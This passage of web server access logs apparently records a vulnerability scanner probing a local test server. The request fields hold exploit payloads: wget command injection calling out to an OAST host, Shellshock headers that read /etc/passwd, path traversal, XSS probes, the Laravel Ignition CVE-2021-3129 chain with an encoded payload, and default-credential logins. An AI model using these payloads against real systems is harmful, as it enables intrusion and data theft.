(KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"admuser=admin&admpass=;wget http://c9v8hs0smpv8c6ag07h0j9mff9qzfoex3.oast.online;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test-cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2M5djhoczBzbXB2OGM2YWcwN2gwaXFtdWFtYTd1MXl6eS5vYXN0Lm9ubGluZWA=\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"$(id>webLib/x)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /SDK/webLanguage HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA